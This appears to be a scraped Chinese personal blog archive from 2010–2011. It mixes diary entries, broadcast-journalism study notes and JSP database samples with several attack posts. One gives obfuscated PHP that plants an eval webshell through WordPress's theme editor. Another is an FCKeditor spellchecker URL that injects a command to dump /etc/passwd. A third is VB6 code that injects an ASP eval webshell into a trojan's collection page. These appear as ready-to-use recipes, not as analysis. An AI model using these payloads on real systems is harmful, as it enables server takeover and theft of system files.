wordpress 拿webshell

2011年07月3日

别的地方看到的

留着以后备用

进入后台

后台-外观-编辑,随便找一个文件插入以下代码

 <script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>

然后访问下该文件,比如是默认主题我插的404.php那么直接访问

http://0day.kr/wp-content/themes/default/404.php

,这样就在该目录下生成a.php的一句话,密码是a

装修告一段落

2011年01月20日

说起来,我都N久没有更新过博客了,现在也不像以前那样经常更新技术文章,写写自己的心情日志。人懒了。

从回来就一直忙着房子装修的事,总算折腾完了。接下来又要准备结婚的一些事宜。有的忙咯。

说这么点,其实也算不上是博客了,顶多也就叫个微博了,嗯,对,就叫这个,最近比较流行!

最后祝朋友们新年快乐!

笔记

2010年11月22日

问答题:

1.   怎么样准备一篇评论稿?

A,   找准中心论点,中心论点只有一个中心点—总论点,分论点—为论证总论点的需要而设的各个观点,一层层意思,论点不是论题,论题又称选题—指论述的什么事

B,    梳理论据,论据主要有两类–事实性论据,理论性论据  一种特殊论据 典故广为流传的故事  怎么梳理论据 几个论据属于哪一类 论据怎样编排组合的,在哪一个层次主持一个谈话栏目 就要重视选择论据并合理编排论据

C,    明确论证方法  常用的几种:例证法,引例法,喻证法,反证法

D,   把握结构布局,新闻评论的结构特点 逻辑结构,如何提出问题,分析问题,解决问题的谋篇布局,怎么开头,怎么转接过渡,怎样结尾

E,    联系背景,思考评论的针对性  针对性—评论发表的迫切的现实意义,也是评论的价值所在

2.   评论的三要素:论点,论据,论证

3.   评论文体结构:标题,引论,本论,结论

4.   评论播音表达的基本要求:观点鲜明,逻辑严密,论述有力、以理服人

5.   议论文体的两个基本特点:表态性 —直抒已见  说理性—议论说理

6.   新闻评论的两个基本特点:1,新闻性:现实针对性 强烈的时效性—对现实做出及时反应  2,政论性:鲜明的政治立场和态度,注重选题的政治意义,着重从思想政治的高度分析论述问题

7.   怎么播好标题和开头?

A,    稳健的状态—气息饱满,声音扎实,语速沉稳

B,    播标题—-鲜明,醒目,内心依据要充分

C,    开头—从容 尤其句首出口要求不快不高,不急不促

D,    稳健—-不是四平八稳,不是一味的缓慢,是节奏稳健和紧凑的有机结合

8.   怎样体现评论的说理层次?

A要求各层各段之间,切分合理,衔接合理,过渡自然

提示两点:a,运用停连和语气转换,体现说理层次b重视关联词语的表达 关联词语用在说理的层次之间,标示了层与层之间的逻辑关系,关联词语的表达,大胆拎起来,可以扬起来点,加以突出,引起注意,形成呼应。

9.   怎么理解把握评论播音分寸感?

播音员在评论播音中的感情态度,必须符合党的政策尺度,播音员播评论不能无动于衷,要有态度感情,并与评论内容相符,态度感情不能不够,也不能过火,以党的政策为尺度。语言表达适度,声音形式与评论稿件点的态度感情色彩分量的统一,是评论基调在声音上的实际把握。

10.  怎么理解评论播音以“理”服人?

以理服人,首先就区别与以势压力或墟声嗲气的取悦于人,而是依凭正确的观点,严密的逻辑,大方而又宽广的气度,令人听后心悦诚服

其次,总的说评论播音是比较严肃,比较郑重的。但这决不是说一播评论就要板起面孔,通俗的说,评论就是发表意见,为什么发表意见?就因为这个事物或问题关系到党和国家的大事,关系到人民群众的切身利益。而我们是坚定的站在党的立场和人民群众心连心,关系到人民群众切身利益的事都会牵动着我们的心。

因此,好的评论播音都应注意处理好,事,情,理的关系,做到寓情于理,情景交融,道理论述的透彻,感情表露的真切。

新闻(消息)播音的重要性

一.    电台,电视台最重要,最权威的节目是新闻节目

二.    新闻播音员是电台,电视台的代言人

三.    代表国家的形象

新闻消息的类型:动态新闻,述评新闻,录音新闻,典型报道,新闻特写,现场报道

播音方式:播报式,宣读式,谈话式

新闻消息的特点及新闻播音的定位

定义:新近发生事情的报道

三字特点:真—基础  要求庄重的态度,真挚的感情,朴实的语言

新—核心  要求敏锐的感受到新,播报出新

快—特点  要求时间观念,应变能力,严细作风,扎实的语言基本功

小结:新闻消息的特点决定了新闻播音的方法及风格,感情表达庄重大方,亲切朴实,语言特点,流畅明快,简洁规范,思维运动,清晰明快,逻辑性强

备稿:广义备稿

1.   了解上情2 熟悉下情 3 知道外情 4 丰富知识 5 锻练过硬的语言基本功

狭义备稿

1 弄情事情,明确基调,抓导语 2 把握结构,理清脉络,抓层次3 确定重点,设计表达,抓灵魂

新闻表达的基本要求 1 内容准确,逻辑清晰2 态度明朗,感情饱满 分寸得当 朴实自然 3 语言明快,流畅,具有新鲜感

1 内容准确,逻辑清晰 克服内容“散 ”

2 态度明朗,感情饱满 分寸得当 克服感情“淡”

3 语言明快,流畅,具有新鲜感,克服语音“拙”

介词,连词,助词等虚词的处理技巧

语势平稳,气均声畅 语流通畅,紧凑不拖,用实声不用虚声,自如声区留有余地,出口积极,看准就念,不迟疑 不犹豫,干脆利落,加节奏

电视专题片特点:真实性 —用真实的自然的和社会的原生形态,来再现客观世界,现实生活,表现创作主题的某种见解与情感,

综合性—涉及的领域和题裁很广,具体政治性,知识性,教育性,服务性,欣赏性

多样性—允许应用多种形式和手段进行创作 解说有叙述讲解,议论说理,描绘抒情等。

电视专题片的创作要素

使用符号最多,既有可听性,又有可视性

1画面 2 解说 3 音乐 4音响 5 同期声 6 字幕

电视专题片的种类

风情片 人物片 科教片 政论片

解说与画面的关系

画面表现背景,内涵,抽象,概括性东西,人物内心等,有一定局限性,而解说具有的概括力,深入性,指向性正好弥补。画面为主,解说为辅。画面是表达的主题,解说只是围绕画面适度发挥自己的作用

解说为主,画面为辅。解说比画面更丰富,重要成为片子的主导,画面只是为解说提供环境氛围,增加形象感和现场感 ,解说位置可靠前,表达份量加重。

议论型解说的表达特点:

吐字饱满,声气力度较强,以实声为主,节奏多凝重,高亢

不同风格,也有需要平实,客观,语势较平缓

解说与画面互补互换

1 画面解说不时转换主导,画面表现形象部分,解说反映较抽象的内容

2 解说和画面的地位价值同等,该靠前时就上,当后撤时就退让

解说创作的原则

1 与片子的立意风格一致

2 与画面的段落位置相吻合

3 与画面的情绪气氛相和谐

4 与音响效果同期声相协调

解说的作用

1 提示说明—解释说明 与解说词对位的画面 应加强解释的感觉

2 补充丰富 —扩大画面内涵,使观众更好理解,应据写法该描则描,该叙则叙,该议则议,该抒则抒。

3 抒情造境— 以优美抒情语言,直抒意义或融入介绍说明文字,自然流露 ,解说应感情真挚,色彩浓郁

4 深化文题—将编导立意观点直接表露出来,成为全片内容的点题升华,播这类解说词,情感比较浓烈,比较强调,烘托添趣。

什么叫通讯?通讯是以详细记述的手法,形象生动的报道新闻 事实的体裁

通讯体裁的特点?真实 感情色彩浓 具有评议性

通讯的种类: 人物通讯  事件通讯  风貌通讯,工作通讯

通讯播音的要求:1 理清线索 2 细腻感受 3 感情真挚 语淡情浓

几个需要注意的问题:1 播好标题和开头 2 人物语言 求神似 3 把握好基调 4 声音和气息的运用

正确认识和处理好与受众的关系?

以平等的态度说理,引起受众的认同共鸣

评论:言论的总称,论说文,议论文的总称 ,广播电视中常见的论文体裁

述评:即报道事实,又对新闻事实做必要的分析和评价,重点是评述是为评服务的。基本特点是评述结合,以评为主,述中有评,评中有述,由述而评,以评驭述

漫淡:不拘形式地就某个问题谈谈自己的体会或见解。

怎么把握评论重点:

论点:集中体现播讲目的的地方 包括中心论点 分论点 解决问题的方法和原则等。

怎样突出重点:

重点的突出与非重点的削弱在对比中显现,利用听觉反差效应,使重点突出,要感觉突出的声音形式与弱化的声音形式的不同。

重点的呼应:

关键句子强调的方法,声音形式有相对的一致性,从听觉给人以相对稳定的声音强势,就造成了重点句那种 声音强势的反复听觉刺激。

JSP连接各类数据库大全

2010年04月20日

一、jsp连接Oracle8/8i/9i数据库(用thin模式)
  testoracle.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“oracle.jdbc.driver.OracleDriver”).newInstance();
  String url=”jdbc:oracle:thin:@localhost:1521:orcl”;
  //orcl为你的数据库的SID
  String user=”scott”;
  String password=”tiger”;
  Connection conn= DriverManager.getConnection(url,user,password);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();
  %>
  </body>
  </html>

二、jsp连接Sql Server7.0/2000数据库

  testsqlserver.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“com.microsoft.jdbc.sqlserver.SQLServerDriver”).newInstance();
  String url=”jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=pubs”;
  //pubs为你的数据库的
  String user=”sa”;
  String password=”";   
  Connection conn= DriverManager.getConnection(url,user,password);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();   
  %>
  </body>
  </html>

三、jsp连接DB2数据库

  testdb2.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“com.ibm.db2.jdbc.app.DB2Driver “).newInstance();
  String url=”jdbc:db2://localhost:5000/sample”;
  //sample为你的数据库名
  String user=”admin”;
  String password=”";
  Connection conn= DriverManager.getConnection(url,user,password);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();
  %>
  </body>
  </html>

四、jsp连接Informix数据库

  testinformix.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“com.informix.jdbc.IfxDriver”).newInstance();
  String url =
  ”jdbc:informix-sqli://123.45.67.89:1533/testDB:INFORMIXSERVER=myserver;
  user=testuser;password=testpassword”;
  //testDB为你的数据库名
  Connection conn= DriverManager.getConnection(url);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();
  %>
  </body>
  </html>

五、jsp连接Sybase数据库

  testmysql.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“com.sybase.jdbc.SybDriver”).newInstance();
  String url =” jdbc:sybase:Tds:localhost:5007/tsdata”;
  //tsdata为你的数据库名
  Properties sysProps = System.getProperties();
  SysProps.put(“user”,”userid”);
  SysProps.put(“password”,”user_password”);
  Connection conn= DriverManager.getConnection(url, SysProps);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();
  %>
  </body>
  </html>

六、jsp连接MySQL数据库

  testmysql.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“org.gjt.mm.mysql.Driver”).newInstance();
  String url=”jdbc:mysql://localhost/softforum?user=soft&password=soft1234&useUnicode=true&characterEncoding=8859_1″
  //testDB为你的数据库名
  Connection conn= DriverManager.getConnection(url);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();
  %>
  </body>
  </html>

七、jsp连接PostgreSQL数据库

  testmysql.jsp如下:
  <%@ page contentType=”text/html;charset=gb2312″%>
  <%@ page import=”java.sql.*”%>
  <html>
  <body>
  <%Class.forName(“org.postgresql.Driver”).newInstance();
  String url =”jdbc:postgresql://localhost/soft”
  //soft为你的数据库名
  String user=”myuser”;
  String password=”mypassword”;
  Connection conn= DriverManager.getConnection(url,user,password);
  Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
  String sql=”select * from test”;
  ResultSet rs=stmt.executeQuery(sql);
  while(rs.next()) {%>
  您的第一个字段内容为:<%=rs.getString(1)%>
  您的第二个字段内容为:<%=rs.getString(2)%>
  <%}%>
  <%out.print(“数据库操作成功,恭喜你”);%>
  <%rs.close();
  stmt.close();
  conn.close();
  %>
  </body>
  </html>

Select Top在不同数据库中的用法

2010年04月19日

1. ORACLE
SELECT * FROM TABLE1 WHERE ROWNUM<=N
2. INFORMIX
SELECT FIRST N * FROM TABLE1
3. DB2
SELECT * ROW_NUMBER() OVER(ORDER BY COL1 DESC) AS ROWNUM WHERE ROWNUM<=N
或者
SELECT COLUMN FROM TABLE FETCH FIRST N ROWS ONLY
4. SQL SERVER
SELECT TOP N * FROM TABLE1
5. SYBASE
SET ROWCOUNT N
GO
SELECT * FROM TABLE1
6. MYSQL
SELECT * FROM TABLE1 LIMIT N
7. FOXPRO
SELECT * TOP N FROM TABLE ORDER BY COLUMN

FCKeditor 漏洞记录

2010年04月16日

http://xx.com/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?aspell_path=cat%20/etc/passwd%3E%20/tmp/1.txt

征途随机刷信工具

2010年04月11日

很久前写的一个程序了
当时伯乐木马很泛滥的时候在师傅“小珂”指导下写的,今天闲逛EST发现有人PM我要这份代码
就翻了下硬盘找了下,把完整代码和编译好的,修改后的LIN.ASP一起发上来
程序里有一段广告和QQ,大家就不要去加了,之前的一个朋友帮我的。

源码下载地址:http://forum.eviloctal.com/viewthread.php?tid=33302&page=1&fromuid=947#pid144177

再贴一段原来搞的伯乐杀手的代码。现在都很少人用这收信程序了。

Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + “/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3″) ‘用inet连接网页
aa = InStr(Inet1.GetHeader, “404″) ‘判断页头是否包含字符“404”,返回0则不包含,否则返回其位置
If aa <> 0 Then ‘页头中包含404
MsgBox “木马插入失败!”, 48, “失败!” ‘则说明该网页不存在
Else ‘如果页头中不包含“404”
MsgBox “木马插入成功!”, 64, “恭喜!” ‘说明网页存在
Command2.Enabled = True
End If
End Sub

Private Sub Command2_Click()
If Text2.Text = Text1.Text + “/mibaoaa.asp” Then
MsgBox “已经存在!请不要重复此操作!”, 16, “error!”
Else
Text2.Text = Text1.Text + “/mibaoaa.asp”
MsgBox “请使用一句话木马客户段连接!密码ad!”, 64, “成功!”
Text2.Visible = True
End If
End Sub

Private Sub Command3_Click()
End
End Sub

2010年04月10日

泪,是幸福的泪。
无意看到老婆写的一篇博文。才知道我对她是那么重要,她是那么的思念我。
而我对于这一切是一无所知,甚至还怀疑过她。
今天跟老婆算是谈了下心吧,老婆也把她一直憋在心里的委屈全部吐露出来,怪我从来不主动去争取她,怪我当初没有去挽留她,而是选择了默默的离开,以至于我离开的那段时间,她夜夜买醉,以酒浇愁。
其实我是个不善于表达自己的人,有什么事都喜欢搁心里,心里明明是喜欢的,可嘴上是不会说。如果我喜欢的她突然有一天说“我们不适合,还是分开吧”那我会信以为真,并且选择默默离开不去做任何挽留。当时,心事碎着离开的。事后,我会后悔,很后悔。
离开她的那段日子,心里是思念着她的,每次听到钢琴曲《梦中的婚礼》。在她办公室里她为我演奏的那一幕就出现的眼前。想,真的很想,但是嘴上是不会说的,我很犟。老妈曾经说过我犟的像个牛犊子。
得知我离开那段时间她为了争取家人的认可为我所做的一切,所受的委屈。心,好酸好酸。泪,无情的落了下来,但这是幸福的泪,有个这么爱自己的人,是多么幸福的一件事。
老婆,放心了!这次我一定会紧紧抓住你的手,再也不松开。无论发生什么事,我们永远在一起你,再也不离开你了。
请原谅我当初离开你。对不起!

夫妻生活写实

2010年04月8日

番茄鸡蛋面

2010年04月5日

我最喜欢吃的就是面食了
所以今天自己尝试着做了一下番茄鸡蛋面,由于是第一次下面,所以也没把握好份量,结果放多了面,无奈啊。于是在加水,本来两个人吃,结果硬是做出了3大碗鸡蛋面出来。又要剩饭咯。
可惜的是老婆不是很喜欢吃面,以后还要再接再砺学习做别的菜。